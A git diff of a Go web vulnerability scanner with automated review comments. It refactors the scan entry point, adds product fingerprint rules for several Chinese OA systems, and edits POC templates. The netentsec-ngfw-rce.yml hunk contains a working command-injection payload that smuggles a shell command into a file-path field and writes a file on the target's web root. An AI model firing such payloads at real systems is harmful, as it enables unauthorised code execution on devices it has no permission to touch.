diff --git a/WebScan/WebScan.go b/WebScan/WebScan.go
index a7a0f18..a2274fd 100644
--- a/WebScan/WebScan.go
+++ b/WebScan/WebScan.go
@@ -14,27 +14,28 @@ var Pocs embed.FS
 
 func WebScan(info *common.HostInfo) {
 	var pocinfo = common.Pocinfo
-	buf := strings.Split(info.Url,"/")
-	pocinfo.Target = strings.Join(buf[:3],"/")
-	for _,infostr := range info.Infostr {
+	buf := strings.Split(info.Url, "/")
+	pocinfo.Target = strings.Join(buf[:3], "/")
+	if pocinfo.PocName != "" {
+		Execute(pocinfo)
+		return
+	}
+	for _, infostr := range info.Infostr {
 		pocinfo.PocName = lib.CheckInfoPoc(infostr)
-		err := Execute(pocinfo)
-		if err != nil {
-			errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err)
-			common.LogError(errlog)
-		}
+		Execute(pocinfo)
 	}
 }
 
-func Execute(PocInfo common.PocInfo) error {
+func Execute(PocInfo common.PocInfo) {
 	req, err := http.NewRequest("GET", PocInfo.Target, nil)
 	if err != nil {
-		return err
+		errlog := fmt.Sprintf("[-] webtitle %v %v", PocInfo.Target, err)
+		common.LogError(errlog)
+		return
 	}
 	req.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
 	if PocInfo.Cookie != "" {
 		req.Header.Set("Cookie", PocInfo.Cookie)
 	}
 	lib.CheckMultiPoc(req, Pocs, PocInfo.Num, PocInfo.PocName)
-	return nil
 }
diff --git a/WebScan/info/rules.go b/WebScan/info/rules.go
index 83eea01..510e542 100644
--- a/WebScan/info/rules.go
+++ b/WebScan/info/rules.go
@@ -12,8 +12,8 @@ type Md5Data struct {
 }
 
 type PocData struct {
-	Name string
-	Alias string
+	Name  string
+	Alias string
 }
 
 var RuleDatas = []RuleData{
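Review bot: `pocinfo.Target = strings.Join(buf[:3], "/")` still indexes three elements unconditionally, so an info.Url with fewer than two slashes (a bare host, anything missing the scheme) makes the slice expression panic and takes down the scan instead of logging a skipped target, and the new early-return path runs after that line so it does not help. Guard it before use, e.g. `if len(buf) < 3 { common.LogError(fmt.Sprintf("[-] webscan bad url %v", info.Url)); return }`, or derive Target from net/url instead. Separately, the log label moved into Execute still reads `[-] webtitle`, a leftover from the title-grabbing path that will mislead anyone grepping the log; `[-] webscan %v %v` matches what this function does. Whether lib.CheckInfoPoc returns an empty name for unmatched fingerprints, and what CheckMultiPoc does with an empty PocName, is not visible here; if it does, the loop body should skip those iterations rather than call Execute.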
@@ -120,6 +120,7 @@ var RuleDatas = []RuleData{
 	{"Jboss", "code", "(Welcome to JBoss|jboss.css)"},
 	{"Jboss", "headers", "(JBoss)"},
 	{"泛微E-mobile", "code", "(Weaver E-mobile|weaver,e-mobile)"},
+	{"泛微E-Mobile", "headers", "(EMobileServer)"},
 	{"齐治堡垒机", "code", "(logo-icon-ico72.png|resources/themes/images/logo-login.png)"},
 	{"ThinkPHP", "headers", "(ThinkPHP)"},
 	{"ThinkPHP", "code", "(/Public/static/js/)"},
@@ -136,6 +137,11 @@ var RuleDatas = []RuleData{
 	{"finereport", "code", "(isSupportForgetPwd|FineReport,Web Reporting Tool)"},
 	{"蓝凌OA", "code", "(蓝凌软件|StylePath:\"/resource/style/default/\"|/resource/customization)"},
 	{"GitLab", "code", "(href=\"https://about.gitlab.com/)"},
+	{"用友NC", "code", "(YONYOU NC | /Client/Uclient/UClient.dmg)"},
+	{"Jquery-1.7.2", "code", "(/webui/js/jquerylib/jquery-1.7.2.min.js)"},
+	{"Hadoop Applications", "code", "(/cluster/app/application)"},
+	{"用友IUFO", "code", "(iufo/web/css/menu.css)"},
+	{"海昌OA", "code", "(/loginmain4/js/jquery.min.js)"},
 }
 
 var Md5Datas = []Md5Data{
@@ -162,15 +168,17 @@ var Md5Datas = []Md5Data{
 }
 
 var PocDatas = []PocData{
-	{"致远OA","seeyon"},
-	{"泛微OA","weaver-oa"},
-	{"通达OA","tongda"},
-	{"ThinkPHP","thinkphp"},
-	{"Nexus","nexus"},
-	{"齐治堡垒机","qizhi"},
-	{"weaver-ebridge","weaver-ebridge"},
-	{"weblogic","weblogic"},
-	{"zabbix","zabbix"},
-	{"VMware vSphere","vmware"},
-	{"Jboss","jboss"},
-}
\ No newline at end of file
+	{"致远OA", "seeyon"},
+	{"泛微OA", "weaver-oa"},
+	{"通达OA", "tongda"},
+	{"ThinkPHP", "thinkphp"},
+	{"Nexus", "nexus"},
+	{"齐治堡垒机", "qizhi"},
+	{"weaver-ebridge", "weaver-ebridge"},
+	{"weblogic", "weblogic"},
+	{"zabbix", "zabbix"},
+	{"VMware vSphere", "vmware"},
+	{"Jboss", "jboss"},
+	{"用友NC", "yongyou"},
+	{"用友IUFO", "yongyou"},
+}
diff --git a/WebScan/pocs/jumpserver-unauth-rce2.yml b/WebScan/pocs/jumpserver-unauth-rce2.yml
index 34bb49e..353329d 100644
--- a/WebScan/pocs/jumpserver-unauth-rce2.yml
+++ b/WebScan/pocs/jumpserver-unauth-rce2.yml
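Review bot: The added headers rule names the product `泛微E-Mobile` while the existing code rule directly above it spells the same product `泛微E-mobile`, so one product now fingerprints under two different names; if the name-to-POC lookup (PocDatas or CheckInfoPoc) compares names exactly, a headers match and a code match will not be routed the same way. Use a single spelling, `{"泛微E-mobile", "headers", "(EMobileServer)"}`. Note that neither spelling appears in PocDatas in this diff, so the match may currently be informational only; worth confirming before relying on it.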
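Review bot: The new `用友NC` pattern `(YONYOU NC | /Client/Uclient/UClient.dmg)` pads the alternation with spaces, so it matches `YONYOU NC ` only with a trailing space and `/Client/...` only with a leading one, unlike every other rule in the table; a page with `YONYOU NC</title>` or `src="/Client/Uclient/UClient.dmg"` will not match. Drop the padding: `{"用友NC", "code", "(YONYOU NC|/Client/Uclient/UClient.dmg)"}`. The `Jquery-1.7.2` rule keys a product name on a generic library path and will fire on many unrelated sites; whether anything downstream acts on that name is not visible here.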
@@ -2,7 +2,7 @@ name: poc-yaml-jumpserver-unauth-rce
 set:
   r1: randomLowercase(5)
 rules:
-  - method: GET
+  - method: GET
     path: /api/v1/users/connection-token/
     follow_redirects: false
     expression: |
diff --git a/WebScan/pocs/netentsec-ngfw-rce.yml b/WebScan/pocs/netentsec-ngfw-rce.yml
index 51336aa..bff8b28 100644
--- a/WebScan/pocs/netentsec-ngfw-rce.yml
+++ b/WebScan/pocs/netentsec-ngfw-rce.yml
@@ -7,7 +7,8 @@ set:
 rules:
   - method: POST
     path: /directdata/direct/router
-    body: {"action":"SSLVPN_Resource", "method":"deleteImage", "data":[{"data":["/var/www/html/{{r1}};expr {{r3}} + {{r4}} > /var/www/html/{{r2}}"]}], "type":"rpc", "tid":17, "f8839p7rqtj":"="}
+    body: >-
+      {"action":"SSLVPN_Resource", "method":"deleteImage", "data":[{"data":["/var/www/html/{{r1}};expr {{r3}} + {{r4}} > /var/www/html/{{r2}}"]}], "type":"rpc", "tid":17, "f8839p7rqtj":"="}
     expression: response.status == 200
   - method: GET
     path: /{{r2}}
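Review bot: The switch to `body: >-` presumably exists because a brace-led value is parsed by YAML as a flow mapping rather than the JSON string the POC engine expects, but nothing in the file records that, and the next tidy-up may fold it back into one line; a comment above the key would prevent that, `# folded scalar: keep the JSON as a string, a bare {...} here is parsed as a YAML mapping`. The payload also writes `/var/www/html/{{r2}}` on the target and this hunk shows no rule that removes it; if no later rule does, every scan leaves a world-readable artifact on a production firewall, which the POC header should call out so operators can clean up.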